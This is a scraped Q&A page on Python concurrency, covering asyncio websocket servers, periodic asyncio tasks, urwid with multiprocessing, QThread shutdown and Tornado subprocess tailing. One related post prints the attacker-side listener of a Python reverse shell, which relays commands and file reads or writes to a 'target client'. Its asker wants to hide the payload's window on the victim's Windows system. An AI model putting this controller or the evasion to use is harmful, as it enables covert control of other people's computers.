Python Autobahn WebSocket server receiving one connection at a time - websocket

Python's asyncio or Twisted, as used by Autobahn, is supposed to handle concurrent connections at the same time.
I followed a good tutorial on Autobahn's read-the-docs and it all worked well, yet the server receives only one connection, processes its requests, and only after that accepts a second one.
How can I ensure that the server accepts multiple connections concurrently, without holding up other connecting peers?
I have searched across the web the whole day with no success.
Here is my code (I have cut out a lot of code while debugging):
import json
import asyncio

from autobahn.asyncio.websocket import WebSocketServerProtocol
from autobahn.asyncio.websocket import WebSocketServerFactory


class NMmapperServerProtocol(WebSocketServerProtocol):
    cmd = NMmapperWSCommandParser()  # I have cut this out while debugging

    async def onMessage(self, payload, isBinary):
        """
        payload: the message
        isBinary: whether it's a binary message
        """
        try:
            offload_payload = json.loads(payload.decode("utf-8"))
            await asyncio.gather(self.cmd.processWSCommands(offload_payload, self))
        except Exception as e:
            raise

    def onConnect(self, request):
        """
        Called when a peer connects to our server
        """
        try:
            # print(self)
            print(request.peer, "has connected")
        except Exception as e:
            raise

    def onOpen(self):
        """
        The connection is now fully established
        """
        try:
            # Some database actions can be done from here
            print("Connection now opened")
        except Exception as e:
            raise

    def onClose(self, wasClean, code, reason):
        """
        The client is closing their connection
        """
        try:
            print("wasClean ", wasClean)
            print("code ", code)
            print("reason ", reason)
        except Exception as e:
            raise

    # Setters
    def setCsrftoken(self, cookie_string):
        """
        Parse and set the CSRF token
        """
        self.csrftoken = self.parse_csrftoken(cookie_string)

    # Setters
    def setSession(self, cookie_string):
        """
        Parse and set the session
        """
        self.session = self.parse_session(cookie_string)


if __name__ == "__main__":
    if IN_PRODUCTION:
        print("RUNNING")
        factory = NMmapperWSServerFactory(PRODUCTION_HOST, PRODUCTION_PORT)
        factory.run_loop()
    else:
        print("Running on dev")
        factory = WebSocketServerFactory()
        factory.protocol = NMmapperServerProtocol

        loop = asyncio.get_event_loop()
        coro = loop.create_server(factory, '0.0.0.0', 9000)
        server = loop.run_until_complete(coro)

        try:
            loop.run_forever()
        except KeyboardInterrupt:
            pass
        finally:
            server.close()
            loop.close()
Thank you.

I finally got it working as expected. Since this is an asyncio library, I had to prefix async to each method that performs a long-running task.
The problem was in onMessage: I had to process the messages concurrently so as not to block the other clients wanting their messages processed too. So I had to do this:

offload_payload = json.loads(payload.decode("utf-8"))
loop = asyncio.get_event_loop()
# Offload command processing
loop.create_task(self.cmd.processWSCommands(offload_payload, self))

This way every message is processed concurrently. Even then, make sure the method or function that processes the message doesn't block.
import json
import asyncio

from autobahn.asyncio.websocket import WebSocketServerProtocol
from autobahn.asyncio.websocket import WebSocketServerFactory


class NMmapperServerProtocol(WebSocketServerProtocol):
    cmd = NMmapperWSCommandParser()  # I have cut this out while debugging

    async def onMessage(self, payload, isBinary):
        """
        payload: the message
        isBinary: whether it's a binary message
        """
        try:
            offload_payload = json.loads(payload.decode("utf-8"))
            loop = asyncio.get_event_loop()
            # Offload command processing so onMessage returns immediately
            loop.create_task(self.cmd.processWSCommands(offload_payload, self))
        except Exception as e:
            raise

    def onConnect(self, request):
        """
        Called when a peer connects to our server
        """
        try:
            # print(self)
            print(request.peer, "has connected")
        except Exception as e:
            raise

    def onOpen(self):
        """
        The connection is now fully established
        """
        try:
            # Some database actions can be done from here
            print("Connection now opened")
        except Exception as e:
            raise

    def onClose(self, wasClean, code, reason):
        """
        The client is closing their connection
        """
        try:
            print("wasClean ", wasClean)
            print("code ", code)
            print("reason ", reason)
        except Exception as e:
            raise

    # Setters
    def setCsrftoken(self, cookie_string):
        """
        Parse and set the CSRF token
        """
        self.csrftoken = self.parse_csrftoken(cookie_string)

    # Setters
    def setSession(self, cookie_string):
        """
        Parse and set the session
        """
        self.session = self.parse_session(cookie_string)


if __name__ == "__main__":
    if IN_PRODUCTION:
        print("RUNNING")
        factory = NMmapperWSServerFactory(PRODUCTION_HOST, PRODUCTION_PORT)
        factory.run_loop()
    else:
        print("Running on dev")
        factory = WebSocketServerFactory()
        factory.protocol = NMmapperServerProtocol

        loop = asyncio.get_event_loop()
        coro = loop.create_server(factory, '0.0.0.0', 9000)
        server = loop.run_until_complete(coro)

        try:
            loop.run_forever()
        except KeyboardInterrupt:
            pass
        finally:
            server.close()
            loop.close()
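Note that create_task only helps if processWSCommands is itself a well-behaved coroutine. If it has to call blocking code (synchronous I/O, heavy CPU work), the event loop thread is still held up. A minimal sketch of one way around that, assuming a hypothetical blocking_lookup helper, is to push the blocking call onto the loop's default thread pool with run_in_executor:

import asyncio
import json

def blocking_lookup(payload):
    # hypothetical stand-in for a blocking call (a DB query, a scan, ...)
    return {"result": "done"}

# inside NMmapperWSCommandParser
async def processWSCommands(self, payload, proto):
    loop = asyncio.get_event_loop()
    # the blocking part runs in the default thread-pool executor,
    # so the event loop stays free to service other connections
    result = await loop.run_in_executor(None, blocking_lookup, payload)
    proto.sendMessage(json.dumps(result).encode("utf-8"))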

Related

Python asyncio class to create functions dynamically and execute each in parallel with its own interval

I am trying to write a class that creates methods dynamically, each of which should execute in parallel with its own duration, using asyncio. I am really new to the topic of Python asyncio and am now stuck at a point where I have no idea how to continue.
I collect servers with IP, port and command duration from a config file, try to create methods in a loop, and then gather these methods with asyncio. Here is my code:
import asyncio
from datetime import datetime
# from common.config import ConfigConstructor


class RCONserver:
    def __init__(self, game: str, server_name=None):
        self.game = game
        self.server_name = server_name
        # self.game_config = ConfigConstructor('cfg/rcon_server.yml')

    async def send_rcon_command(self, ip: str, port: str, period: int, cnt: int):
        await asyncio.sleep(int(period))
        print(str(datetime.now()) + ": " + ip + " " + port)

    def get_servers(self):
        servers = []
        for server in ['game1', 'game2']:
            print(server)
            if server[:4] == "game":
                # s = self.game_config
                # s.fetch_section(server)
                # print(s)
                servers.append(
                    self.send_rcon_command('192.168.178.1',
                                           '30000',
                                           300,
                                           3))
        return servers


async def main():
    obj = RCONserver('game')
    await asyncio.gather(*obj.get_servers())


asyncio.run(main())
The code runs, but only once for each server in the yml file.
What do I have to do to run it periodically with the given watch-period parameter?
I think this does the trick: with a loop and gather I can create functions dynamically and run each in parallel with its own interval:
import asyncio
from datetime import datetime
import random


class RCONServer:
    def dt(self):
        return datetime.now().strftime("%Y/%m/%d %H:%M:%S")

    def build_rcon_functions(self):
        rcon_servers = []
        for server in ['game1', 'game2']:
            rcon_servers.append(
                self.rcon_command(server,
                                  "192.168.0.1",
                                  "30000",
                                  "some_password",
                                  random.randint(5, 10))
            )
        return rcon_servers

    async def rcon_command(self, server: str, ip: str, port: str, passwd: str, interval: int):
        # each coroutine loops forever on its own interval
        while True:
            await asyncio.sleep(int(interval))
            print(self.dt(), ">", server)

    async def run_loop(self):
        rcon_tasks = self.build_rcon_functions()
        print(self.dt(), "> Start")
        # gather never returns here, since every task loops forever
        await asyncio.gather(*rcon_tasks)


obj = RCONServer()
try:
    # asyncio.run() creates and closes the event loop itself,
    # so no manual run_forever()/close() is needed
    asyncio.run(obj.run_loop())
except KeyboardInterrupt:
    print("> End")
Any suggestions for optimizing, or hints on how it could be solved better?
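One possible refinement, assuming Python 3.11 or newer (a sketch, not the only way): asyncio.TaskGroup keeps the periodic jobs grouped and cancels the remaining ones cleanly if any task fails:

import asyncio
import random


async def periodic(name: str, interval: int):
    # stand-in for rcon_command: loop forever on this job's own interval
    while True:
        await asyncio.sleep(interval)
        print(name)


async def main():
    async with asyncio.TaskGroup() as tg:
        for server in ['game1', 'game2']:
            tg.create_task(periodic(server, random.randint(5, 10)))


asyncio.run(main())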

Urwid and Multiprocessing

I am trying to sequence some actions in urwid.
I made a timer which runs in the background and communicates with the main process, like this:
from multiprocessing import Process, Pipe
import time
import urwid


def show_or_exit(key):
    if key in ('q', 'Q'):
        raise urwid.ExitMainLoop()


class midiloop(urwid.Frame):
    def __init__(self):
        self.message = urwid.Text('Press Space', align='center')
        self.filler = urwid.Filler(self.message, "middle")
        super().__init__(urwid.Frame(self.filler))

    def keypress(self, size, key):
        if key == " ":
            self.seq()
        else:
            return key

    def timer(self, conn):
        x = 0
        while True:
            if conn.poll() == False:
                pass
            else:
                z = conn.recv()
                if z == "kill":
                    return
            conn.send(x)
            x += 1
            time.sleep(0.05)

    def seq(self):
        self.parent_conn, self.child_conn = Pipe()
        self.p = Process(target=self.timer, args=(self.child_conn,))
        self.p.start()
        while True:
            if self.parent_conn.poll(None):
                self.y = self.parent_conn.recv()
                self.message.set_text(str(self.y))
                loop.draw_screen()
            if self.y > 100:
                self.parent_conn.send("kill")
                self.message.set_text("Press Space")
                return


if __name__ == '__main__':
    midiloop = midiloop()
    loop = urwid.MainLoop(midiloop, unhandled_input=show_or_exit, handle_mouse=True)
    loop.run()
The problem is that I'm blocking urwid's main loop with while True:.
Can anyone give me a solution for listening for the Q key to quit the program before it reaches the end of the loop, for example, and more generally for interacting with urwid while communicating with the subprocess?
It seems to be rather complicated to combine multiprocessing and urwid.
Since you're using a timer and your class is called midiloop, I'm going to guess that maybe you want to implement a mini sequencer.
One possible way of implementing that is using an asyncio loop instead of urwid's MainLoop, and schedule events with the loop.call_later() function. I've implemented a simple drum machine with that approach in the past, using urwid for drawing the sequencer, asyncio for scheduling the play events and simpleaudio to play. You can see the code for that here: https://github.com/eliasdorneles/kickit
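To illustrate the scheduling idea (the step callback and the 0.2-second step length here are made up, not taken from kickit):

import asyncio

def play_step(loop, step):
    # hypothetical: trigger whatever should happen on this step
    print("step", step)
    # schedule the next step 0.2 seconds from now
    loop.call_later(0.2, play_step, loop, (step + 1) % 16)

loop = asyncio.get_event_loop()
loop.call_later(0.2, play_step, loop, 0)
loop.run_forever()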
If you still want to implement communication with multiprocessing, I think your best bet is to use urwid.AsyncioEventLoop and the aiopipe helper for duplex communication.
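The urwid side of that wiring looks roughly like this (the widget is a placeholder; the aiopipe plumbing is not shown):

import asyncio
import urwid

aio_loop = asyncio.get_event_loop()
widget = urwid.Filler(urwid.Text("hello", align="center"), "middle")
# hand urwid the asyncio loop so coroutines and the UI share one event loop
main_loop = urwid.MainLoop(widget, event_loop=urwid.AsyncioEventLoop(loop=aio_loop))
main_loop.run()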
It's not very minimal, I'm afraid, but I did spend a day writing this urwid frontend that starts, stops and communicates with a subprocess.
import os
import sys
from multiprocessing import Process, Pipe, Event
from collections import deque
import urwid


class suppress_stdout_stderr(object):
    """
    Suppresses stdout and stderr by piping them to /dev/null...
    the same place I send bad-faith replies to my tweets
    """
    def __enter__(self):
        self.outnull_file = open(os.devnull, 'w')
        self.errnull_file = open(os.devnull, 'w')
        self.old_stdout_fileno_undup = sys.stdout.fileno()
        self.old_stderr_fileno_undup = sys.stderr.fileno()
        self.old_stdout_fileno = os.dup(sys.stdout.fileno())
        self.old_stderr_fileno = os.dup(sys.stderr.fileno())
        self.old_stdout = sys.stdout
        self.old_stderr = sys.stderr
        os.dup2(self.outnull_file.fileno(), self.old_stdout_fileno_undup)
        os.dup2(self.errnull_file.fileno(), self.old_stderr_fileno_undup)
        sys.stdout = self.outnull_file
        sys.stderr = self.errnull_file
        return self

    def __exit__(self, *_):
        sys.stdout = self.old_stdout
        sys.stderr = self.old_stderr
        os.dup2(self.old_stdout_fileno, self.old_stdout_fileno_undup)
        os.dup2(self.old_stderr_fileno, self.old_stderr_fileno_undup)
        os.close(self.old_stdout_fileno)
        os.close(self.old_stderr_fileno)
        self.outnull_file.close()
        self.errnull_file.close()


def subprocess_main(transmit, stop_process):
    with suppress_stdout_stderr():
        import time
        yup = ['yuuuup', 'yuuuuup', 'yeaup', 'yeoop']
        nope = ['noooooooe', 'noooope', 'nope', 'nope']
        mesg = 0
        i = 0
        while True:
            i = i % len(yup)
            if transmit.poll():
                mesg = transmit.recv()
            if mesg == 'Yup':
                transmit.send(yup[i])
            if mesg == 'Nope':
                transmit.send(nope[i])
            if stop_process.wait(0):
                break
            i += 1
            time.sleep(2)


class SubProcess:
    def __init__(self, main):
        """
        Handles forking, stopping and communicating with a subprocess
        :param main: the subprocess function to run; its signature is
            def main(transmit, stop_process):
        transmit: a multiprocessing Pipe used to send data to the parent process
        stop_process: a multiprocessing Event to set when you want the process to exit
        """
        self.main = main
        self.recv, self.transmit = None, None
        self.stop_process = None
        self.proc = None

    def fork(self):
        """
        Forks and starts the subprocess
        """
        self.recv, self.transmit = Pipe(duplex=True)
        self.stop_process = Event()
        self.proc = Process(target=self.main, args=(self.transmit, self.stop_process))
        self.proc.start()

    def write_pipe(self, item):
        self.recv.send(item)

    def read_pipe(self):
        """
        Reads data sent by the process into a list and returns it
        """
        item = []
        if self.recv is not None:
            try:
                while self.recv.poll():
                    item += [self.recv.recv()]
            except:
                pass
        return item

    def stop(self):
        """
        Sets the event to tell the process to exit.
        Note: this is co-operative multitasking; the process must respect the flag or this won't work!
        """
        self.stop_process.set()
        self.proc.join()


class UrwidFrontend:
    def __init__(self, subprocess_main):
        """
        Urwid frontend to control the subprocess and display its output
        """
        self.title = 'Urwid Frontend Demo'
        self.choices = 'Start Subprocess|Quit'.split('|')
        self.response = None
        self.item = deque(maxlen=10)
        self.event_loop = urwid.SelectEventLoop()
        # start the heartbeat
        self.event_loop.alarm(0, self.heartbeat)
        self.main = urwid.Padding(self.main_menu(), left=2, right=2)
        self.top = urwid.Overlay(self.main, urwid.SolidFill(u'\N{MEDIUM SHADE}'),
                                 align='center', width=('relative', 60),
                                 valign='middle', height=('relative', 60),
                                 min_width=20, min_height=9)
        self.loop = urwid.MainLoop(self.top, palette=[('reversed', 'standout', ''), ], event_loop=self.event_loop)
        self.subprocess = SubProcess(subprocess_main)

    def exit_program(self, button):
        raise urwid.ExitMainLoop()

    def main_menu(self):
        body = [urwid.Text(self.title), urwid.Divider()]
        for c in self.choices:
            button = urwid.Button(c)
            urwid.connect_signal(button, 'click', self.handle_button, c)
            body.append(urwid.AttrMap(button, None, focus_map='reversed'))
        return urwid.ListBox(urwid.SimpleFocusListWalker(body))

    def subproc_menu(self):
        self.response = urwid.Text('Waiting ...')
        body = [self.response, urwid.Divider()]
        choices = ['Yup', 'Nope', 'Stop Subprocess']
        for c in choices:
            button = urwid.Button(c)
            urwid.connect_signal(button, 'click', self.handle_button, c)
            body.append(urwid.AttrMap(button, None, focus_map='reversed'))
        listbox = urwid.ListBox(urwid.SimpleFocusListWalker(body))
        return listbox

    def update_subproc_menu(self, text):
        self.response.set_text(text)

    def handle_button(self, button, choice):
        if choice == 'Start Subprocess':
            self.main.original_widget = self.subproc_menu()
            self.subprocess.fork()
            self.item = deque(maxlen=10)
        if choice == 'Stop Subprocess':
            self.subprocess.stop()
            self.main.original_widget = self.main_menu()
        if choice == 'Quit':
            self.exit_program(button)
        if choice == 'Yup':
            self.subprocess.write_pipe('Yup')
        if choice == 'Nope':
            self.subprocess.write_pipe('Nope')

    def heartbeat(self):
        """
        Heartbeat that runs 24 times per second
        """
        # read from the process
        self.item.append(self.subprocess.read_pipe())
        # display it
        if self.response is not None:
            self.update_subproc_menu(['Subprocess started\n', f'{self.item}\n', ])
            self.loop.draw_screen()
        # set the next beat
        self.event_loop.alarm(1 / 24, self.heartbeat)

    def run(self):
        self.loop.run()


if __name__ == "__main__":
    app = UrwidFrontend(subprocess_main)
    app.run()

Hide payload window on target system. Python Reverse Shell

I'm using this simple Python reverse shell.
When it runs, a command window pops up on the target Windows system. Is there a way to hide it?
import socket

BUFFER_SIZE = 1024
attacker_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


# lets the attacker server listen on the specified port number
def attacker_server_binder(hostname, port_number):
    attacker_server.bind((hostname, port_number))
    attacker_server.listen(5)


# listening for connections
def target_client_connection_receiver():
    while True:
        # receive connection from target client
        target_client, target_client_address = attacker_server.accept()
        if target_client != None:
            break
    print("Connection established to target\n$reverse_shell: ", end="")
    return target_client


# sends data to the client being targeted
def send_data(data, target_client):
    target_client.send(bytes(data, 'utf-8'))
    acknowledgement = target_client.recv(BUFFER_SIZE)
    if acknowledgement == b'ACK':
        # print("Data received at target end")
        receive_data(target_client)
    else:
        print("Acknowledgement receipt not received.\n$reverse_shell: ", end="")


def receive_data(target_client):
    response = ""
    while True:
        received_data = target_client.recv(BUFFER_SIZE)
        received_data = received_data.decode('utf-8')
        response = response + received_data
        if len(received_data) < BUFFER_SIZE:
            break
    print(response + "\n$reverse_shell: ", end="")


def command_handler(target_client):
    data = str(input())
    try:
        data.index('file')
        file_handler(target_client, data)
        return
    except:
        pass
    send_data(data, target_client)


def file_handler(target_client, command):
    target_client.send(bytes(command, 'utf-8'))
    acknowledgement = target_client.recv(BUFFER_SIZE)
    if acknowledgement == b'ACK':
        pass
    data_splits = command.split(' ')
    mode = data_splits[2]
    if mode == 'r':
        receive_data(target_client)
    elif mode == 'w' or mode == 'a':
        print("enter FILE_UPDATE_QUIT to end data transfer")
        while True:
            data = str(input("--> "))
            target_client.send(bytes(data, 'utf-8'))
            if data == 'FILE_UPDATE_QUIT':
                break
        receive_data(target_client)


def main():
    attacker_server_binder("192.168.29.15", 1234)
    # receive connection from target client
    target_client = target_client_connection_receiver()
    while True:
        command_handler(target_client)


main()

How to stop QThread "gracefully"?

I have gotten some help writing the following code, but I need to break out of the loop in the worker thread so the application does not crash when I exit it. At the moment the QThread is still running when I quit the app.
If I use a break statement it works, but then I cannot do another search for hosts, because the loop has exited entirely. I have tried several ways to do it, but no luck. I am new to programming.
class Worker(QThread):
    found = Signal(str)
    notFound = Signal(str)

    def __init__(self):
        QThread.__init__(self)
        self.queue = Queue()

    def run(self):
        while True:
            hostname = self.queue.get()
            output_text = collect_host_status(hostname)
            for i in output_text:
                if "not found" in i:
                    self.notFound.emit(i.replace(" not found", ""))
                else:
                    self.found.emit(i)

    def lookUp(self, hostname):
        self.queue.put(hostname)


class MainWindow(QMainWindow):
    def __init__(self):
        # ...
        self.ui.pushButton_2.clicked.connect(self.buttonclicked)
        self.thread = Worker()
        self.thread.found.connect(self.ui.textEdit_2.append)
        self.thread.notFound.connect(self.ui.textEdit_3.append)
        self.thread.start()

    def buttonclicked(self):
        if self.ui.textEdit.toPlainText():
            self.thread.lookUp(self.ui.textEdit.toPlainText())
Here is the code that collects the host status:

import requests


def get_brss_host_status(host):
    host = host.lower()
    api_url = 'https://some.system.with/api/'
    host_search = 'status/host/{}?format=json'.format(host)
    r = requests.get(api_url + host_search, auth=(loc_brss_user, loc_brss_passwd))
    request_output = r.text
    if request_output == '{"error":"Not Found","full_error":"Not Found"}':
        host2 = host.upper()
        host_search2 = 'status/host/{}?format=json'.format(host2)
        r2 = requests.get(api_url + host_search2, auth=(loc_brss_user, loc_brss_passwd))
        request_output2 = r2.text
        # print('Debug request_output2', request_output2)
        if request_output and request_output2 == '{"error":"Not Found","full_error":"Not Found"}':
            output_string = host + " not found"
        else:
            output_string = host2
    else:
        output_string = host
    return output_string


def collect_host_status(hosts):
    hosts_list = list(hosts.split("\n"))
    status_list = []
    for i in hosts_list:
        host = get_brss_host_status(i)
        status_list.append(host)
    return status_list
The base solution, as suggested in the comments by @ekhumoro, is to use a simple flag in the while loop, which ensures that as soon as the cycle restarts it exits if the condition is no longer met.
Some care should be taken, though, with two important aspects:
- the basic get() of Queue makes the cycle wait indefinitely;
- the function in the example (a network request) might be delayed for some time if any network problem occurs (temporary network issues, etc.).
To correctly solve these issues, the following modifications should be made:
- get() should use a timeout, so that it allows exiting the cycle even when no request is queued; as an alternative, you can unset the "running" flag, put anything on the queue, and check the flag before proceeding: this ensures that you don't have to wait for the queue's get() timeout;
- the network requests should have a minimum timeout too;
- the hosts should be looked up individually from the thread, not as a group, so that the thread can exit even if the requested host list is big and you want to quit in the middle of the lookups.
from queue import Queue, Empty


class Worker(QThread):
    found = Signal(str)
    notFound = Signal(str)

    def __init__(self):
        QThread.__init__(self)
        self.queue = Queue()

    def run(self):
        self.keepRunning = True
        while self.keepRunning:
            hostList = self.queue.get()
            if not self.keepRunning:
                break
            # otherwise:
            # try:
            #     hostList = self.queue.get(timeout=1)
            # except Empty:
            #     continue
            for hostname in hostList.splitlines():
                if not self.keepRunning:
                    break
                if hostname:
                    output_text = get_brss_host_status(hostname)
                    if output_text is None:
                        continue
                    if "not found" in output_text:
                        self.notFound.emit(output_text.replace(" not found", ""))
                    else:
                        self.found.emit(output_text)

    def stop(self):
        self.keepRunning = False
        self.queue.put(None)

    def lookUp(self, hostname):
        self.queue.put(hostname)
And in get_brss_host_status, change the following:

from requests.exceptions import Timeout


def get_brss_host_status(host):
    host = host.lower()
    api_url = 'https://some.system.with/api/'
    host_search = 'status/host/{}?format=json'.format(host)
    try:
        r = requests.get(api_url + host_search,
                         auth=(loc_brss_user, loc_brss_passwd),
                         timeout=1)
    except Timeout:
        # treat an unreachable host as "no result"
        return
    # ...
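On the window side, a minimal sketch of the clean shutdown, assuming the MainWindow from the question: override closeEvent so the app waits for the worker before exiting.

class MainWindow(QMainWindow):
    # ...
    def closeEvent(self, event):
        # ask the worker loop to finish, then block until run() returns
        self.thread.stop()
        self.thread.wait()
        super().closeEvent(event)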

Infinite loop prevents new connections to websocket server

A client connects to the websocket and calls the tail_log method, and then new clients can't connect.
How can I solve this problem?
def on_message(self, message):
    def tail_log(user, ip, port, cmd, log_path, url):
        cmd = "/usr/bin/ssh -p {port} {user}@{ipaddr} {command} {logpath}" \
            .format(user=user, ipaddr=ip, port=port, command=cmd, logpath=log_path)
        f = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
        while True:
            line = f.stdout.readline().strip()
            if line == '':
                self.write_message('failed')
                break
            self.write_message(line)

    tail_log(user=SSH_USER, ip=IP_ADDR, cmd=CMD, port=SSH_PORT, log_path=LOG_PATH, url=SOCKET_URL)
Your infinite loop must yield control back to Tornado's event loop, either by executing a yield or an await, or by returning from the tail_log function. Since your infinite loop never yields control, the event loop can never process any more events, including new websocket connections.
Try using Tornado's own process module to read your subprocess's stdout asynchronously. Something like this:
import tornado.ioloop
import tornado.iostream
import tornado.process
import tornado.web
import tornado.websocket


class TailHandler(tornado.websocket.WebSocketHandler):
    def open(self):
        self.write_message(u"Tailing....")
        self.p = tornado.process.Subprocess(
            "tail -f log.log",
            stdout=tornado.process.Subprocess.STREAM,
            stderr=tornado.process.Subprocess.STREAM,
            shell=True)
        tornado.ioloop.IOLoop.current().add_callback(
            lambda: self.tail(self.p.stdout))
        tornado.ioloop.IOLoop.current().add_callback(
            lambda: self.tail(self.p.stderr))
        self.p.set_exit_callback(self.close)

    async def tail(self, stream):
        try:
            while True:
                line = await stream.read_until(b'\n')
                if line:
                    self.write_message(line.decode('utf-8'))
                else:
                    # "tail" exited.
                    return
        except tornado.iostream.StreamClosedError:
            # Subprocess killed.
            pass
        finally:
            self.close()

    def on_close(self):
        # Client disconnected, kill the subprocess.
        self.p.proc.kill()


class MainHandler(tornado.web.RequestHandler):
    def get(self):
        self.write("""<html><head><script>
            var ws = new WebSocket("ws://localhost:8888/tail");
            ws.onmessage = function (evt) {
                document.write('<p>' + evt.data + '</p>');
            };</script></head></html>""")


def make_app():
    return tornado.web.Application([
        (r"/", MainHandler),
        (r"/tail", TailHandler),
    ])


app = make_app()
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
If you're not on Python 3.5 yet, substitute @gen.coroutine for async def, yield for await, and break for return.
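For reference, the tail coroutine rewritten in that older style might look like this (the rest of TailHandler stays the same):

from tornado import gen
import tornado.iostream


class TailHandler(tornado.websocket.WebSocketHandler):
    # ... open() and on_close() as above ...

    @gen.coroutine
    def tail(self, stream):
        try:
            while True:
                line = yield stream.read_until(b'\n')
                if line:
                    self.write_message(line.decode('utf-8'))
                else:
                    # "tail" exited.
                    break
        except tornado.iostream.StreamClosedError:
            # Subprocess killed.
            pass
        finally:
            self.close()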
